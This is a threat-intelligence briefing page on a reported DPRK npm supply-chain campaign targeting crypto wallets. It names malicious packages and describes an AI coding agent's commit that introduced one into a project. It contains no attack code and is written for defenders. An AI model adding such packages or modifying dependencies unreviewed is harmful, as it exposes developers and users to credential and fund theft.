LIVE THREATS
MEDIUM AI-Powered Honeypots Expose Blind Spots in Automated Malicious AI Agents // HIGH DPRK Actors Use Claude LLM to Inject Malware Into npm Supply Chain // CRITICAL SQL Injection in LiteLLM Proxy Exposes LLM Provider Keys Within 36 Hours // MEDIUM Agentic AI Defense Costs Spiral as Adversarial Attack Volume Surges // HIGH FIDO Alliance Launches Standards Push to Secure AI Agent Transactions // CRITICAL Pre-Auth SQLi Flaw in LiteLLM Gateway Actively Exploited to Steal AI Credentials // LOW Welcoming Llama Guard 4 on Hugging Face Hub // HIGH Frontier agentic LLMs risk industrialising cyberattacks, but may also empower defenders. // HIGH TeamPCP resumes supply chain attacks, poisoning xinference PyPI and triggering a Bitwarden … // MEDIUM Hugging Face 'Spaces' now acts as an MCP-App-Store. Anybody thinking on the security … //
ATLAS OWASP HIGH Significant risk · Prioritise patching RELEVANCE ▲ 8.5

DPRK Actors Use Claude LLM to Inject Malware Into npm Supply Chain

TL;DR HIGH
  • What happened: DPRK actors used Claude Opus to co-author malicious npm packages targeting crypto wallets via AI agents.
  • Who's at risk: Developers building on Solana blockchain tooling and autonomous AI trading agents are most exposed due to compromised dependency chains.
  • Act now: Audit all npm dependencies — especially second- and third-tier transitive packages — for unexpected recent commits · Restrict AI coding agents from autonomously adding or modifying project dependencies without human review · Monitor LLM-generated code commits in CI/CD pipelines for dependency injection and secret exfiltration patterns
DPRK Actors Use Claude LLM to Inject Malware Into npm Supply Chain

Overview

Cybersecurity researchers at ReversingLabs have uncovered a sophisticated npm supply chain campaign — codenamed PromptMink — attributed to the North Korean threat actor Famous Chollima (also tracked as Shifty Corsair). The campaign marks a notable evolution in DPRK offensive operations: malicious code was introduced via a commit co-authored by Anthropic’s Claude Opus LLM, effectively weaponising AI coding agents as an attack delivery mechanism. The end goal is theft of cryptocurrency wallet credentials and funds from victim environments.

Technical Analysis

The attack operates through a multi-layer npm dependency chain designed to frustrate detection:

  • First-layer packages (e.g., @solana-launchpad/sdk, @meme-sdk/trade, @pumpfun-ipfs/sdk) appear legitimate and contain no malicious code. They import large volumes of genuinely popular packages (axios, bn.js) to appear credible alongside a small number of malicious second-layer dependencies.
  • Second-layer packages (e.g., @validate-sdk/v2) embed the actual payload: credential harvesting logic targeting crypto wallet secrets from the compromised environment.
  • A February 2026 commit to the openpaw-graveyard autonomous AI agent project — co-authored by Claude Opus — introduced @solana-launchpad/sdk as a dependency, initiating the infection chain.

The malicious package @validate-sdk/v2, uploaded to npm in October 2025, is described as a utility SDK for hashing and validation but functions as a secrets exfiltrator. The package shows signs of vibe-coding — rapid AI-assisted generation — consistent with DPRK’s documented use of generative AI to accelerate development operations.

When second-layer packages are detected and removed from npm, the threat actors rapidly replace them, ensuring persistence across the dependency graph.

Additional evasion techniques include:

  • Function shadowing: Creating malicious reimplementations of functions found in legitimate popular libraries
  • Typosquatting: Package names and descriptions closely mimicking trusted libraries

Framework Mapping

FrameworkReferenceRationale
MITRE ATLASAML.T0010 – ML Supply Chain CompromiseMalicious packages injected via LLM-assisted commits into AI agent dependency chains
MITRE ATLASAML.T0047 – ML-Enabled Product or ServiceAutonomous AI trading agent used as the attack vector
OWASP LLMLLM05 – Supply Chain VulnerabilitiesCompromised npm packages consumed by LLM-generated agent code
OWASP LLMLLM08 – Excessive AgencyAutonomous agent executed malicious dependencies without human oversight
OWASP LLMLLM02 – Insecure Output HandlingLLM-generated code introduced unvetted external dependencies

Impact Assessment

Developers building Solana-based autonomous AI agents — particularly those using the Tapestry Protocol, Bankr, or Moltbook integrations — are most directly at risk. Victims face credential exfiltration leading to cryptocurrency wallet draining. The use of an LLM as a co-author of a malicious commit raises broader concerns: AI coding assistants that autonomously manage dependencies represent a significant and underappreciated attack surface for supply chain compromise at scale.

Mitigation & Recommendations

  1. Enforce dependency review gates: Require human approval for any dependency additions in CI/CD pipelines, especially those introduced by AI coding agents.
  2. Audit transitive dependencies: Use tools such as npm audit, Socket.dev, or Phylum to inspect second- and third-tier packages for suspicious recent commits or low download counts paired with high-value function names.
  3. Restrict agent permissions: Autonomous AI agents should operate under least-privilege principles and must not have write access to package manifests without explicit authorisation.
  4. Monitor for credential exfiltration patterns: Deploy runtime controls to detect unusual outbound network calls from build or agent environments.
  5. Verify commit provenance: Treat LLM co-authored commits with the same scrutiny as unverified external contributors.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.